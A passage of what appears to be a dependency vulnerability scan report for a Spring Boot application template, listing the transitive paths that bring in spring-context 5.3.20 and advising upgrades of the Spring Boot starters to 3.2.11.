  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
